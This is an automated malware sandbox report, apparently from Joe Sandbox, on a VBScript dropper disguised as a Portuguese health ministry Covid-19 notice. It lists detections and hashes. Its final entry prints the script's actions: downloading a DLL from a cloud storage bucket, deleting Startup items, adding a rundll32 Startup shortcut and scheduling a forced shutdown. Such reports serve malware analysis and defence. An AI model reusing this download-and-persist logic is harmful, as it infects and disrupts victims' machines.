Source: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll |
Avira: detection malicious, Label: TR/Black.Gen2 |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll |
Avira: detection malicious, Label: TR/Black.Gen2 |
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs |
Virustotal: Detection: 25% |
Perma Link |
Source: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll |
Joe Sandbox ML: detected |
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll |
Joe Sandbox ML: detected |
Source: |
Initial file: .write ZXDFVHIJXTXNZLNYYGEJOJNR.responseBody |
Source: |
Initial file: .savetofile LJETZISNBGIJOFCVGWUIZSLT, 2 |
Source: |
Initial file: .write BFLCAJXFUHBOZFMBDCLJVIWJ.responseBody |
Source: |
Initial file: .savetofile SASLHXXIDQYMUYFJXVRVATCD, 2 |
Source: Joe Sandbox View |
IP Address: 8.8.8.8 8.8.8.8 |
Source: Joe Sandbox View |
IP Address: 8.8.8.8 8.8.8.8 |
Source: Joe Sandbox View |
ASN Name: GOOGLEUS GOOGLEUS |
Source: wscript.exe, 00000001.00000002.1051218798.0000022DE835A000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0 |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0? |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.pki.goog/gsr202 |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: http://ocsp.pki.goog/gts1o1core0 |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0 |
Source: wscript.exe, 00000001.00000002.1048503032.0000022DE626D000.00000004.00000020.sdmp |
String found in binary or memory: https://login.live.com |
Source: wscript.exe, 00000001.00000002.1051230457.0000022DE8367000.00000004.00000001.sdmp |
String found in binary or memory: https://pki.goog/repository/0 |
Source: wscript.exe, 00000001.00000002.1051098917.0000022DE824B000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/ |
Source: wscript.exe, 00000001.00000002.1051098917.0000022DE824B000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/kqKv) |
Source: wscript.exe, wscript.exe, 00000001.00000002.1050701507.0000022DE8060000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip |
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zip_)ik$ |
Source: wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/0.zipjysv |
Source: wscript.exe, wscript.exe, 00000001.00000002.1050701507.0000022DE8060000.00000004.00000001.sdmp, wscript.exe, 00000001.00000002.1051196571.0000022DE8348000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll |
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dll/ |
Source: wscript.exe, 00000001.00000002.1048655023.0000022DE632E000.00000004.00000001.sdmp |
String found in binary or memory: https://storage.googleapis.com/mystorage2021/P-16-5.dllenu |
Source: P-16-5[1].dll.1.dr |
Static PE information: .vmp0 and .vmp1 section names |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\P-16-5[1].dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll E5C9CE8563AA0AB460EC150A29161ADC1918245C29647A7BCE353FDD7DF2D651 |
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs |
Initial sample: Strings found which are bigger than 50 |
Source: P-16-5[1].dll.1.dr |
Static PE information: Number of sections : 12 > 10 |
Source: classification engine |
Classification label: mal100.evad.winVBS@1/6@0/2 |
Source: C:\Windows\System32\wscript.exe |
File created: C:\Users\user\AppData\Roaming\eycptlzztfs.vbs |
Jump to behavior |
Source: unknown |
Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs' |
Source: C:\Windows\System32\wscript.exe |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
File read: C:\Windows\System32\drivers\etc\hosts |
Jump to behavior |
Source: Covid19-Min-Saude-Comuinicado-STIBY-11-01-21-224.vbs |
Virustotal: Detection: 25% |
Source: C:\Windows\System32\wscript.exe |
Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 |
Jump to behavior |
Source: C:\Windows\System32\wscript.exe |
Anti Malware Scan Interface: WScript.Shell")WScript.Sleep(300000)Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_& "Primary=true")for each OpSys in OpSysSetretVal = OpSys.Win32Shutdown(6)nextIHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateTextFile("C:\Users\user\AppData\Roaming\eycptlzztfs.vbs", "true");ITextStream.Write("Set SFHISGAPSMULDDGFLMFHDFTG = CreateObject("WScript.Shell")");ITextStream.Write("WScript.Sleep(300000)");ITextStream.Write("Set OpSysSet = GetObject("winmgmts:{authenticationlevel=Pkt," _");ITextStream.Write("& "(Shutdown)}").ExecQuery("select * from Win32_OperatingSystem where "_");ITextStream.Write("& "Primary=true")");ITextStream.Write("for each OpSys in OpSysSet");ITextStream.Write("retVal = OpSys.Win32Shutdown(6)");ITextStream.Write("next");ITextStream.Close();IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.lnk", "true");IWshShell3.SpecialFolders("StartUp");IFileSystem3.DeleteFile("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs", "true");IWshShell3.SpecialFolders("AppData");IFileSystem3.CreateFolder("C:\Users\user\AppData\Roaming\24145662426947");IWshShell3.SpecialFolders("AppData");IWshShell3.SpecialFolders("AppData");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/0.zip", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\0.zip", "2");IServerXMLHTTPRequest2.open("GET", "https://storage.googleapis.com/mystorage2021/P-16-5.dll", "false");IServerXMLHTTPRequest2.send();_Stream.Type("1");_Stream.Open();IServerXMLHTTPRequest2.responseBody();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll", "2");IHost.CreateObject("Wscript.Shell");IWshShell3.SpecialFolders("StartUp");IHost.CreateObject("WScript.Shell");IWshShell3.CreateShortcut("C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gjnpswnghs .lnk");IWshShortcut.TargetPath("rundll32");IWshShortcut.Arguments(" C:\Users\user\AppData\Roaming\24145662426947\uzunfcmnagjwjpnim5415442287920.dll SFsb9V5o7LTfxDWhDoh" |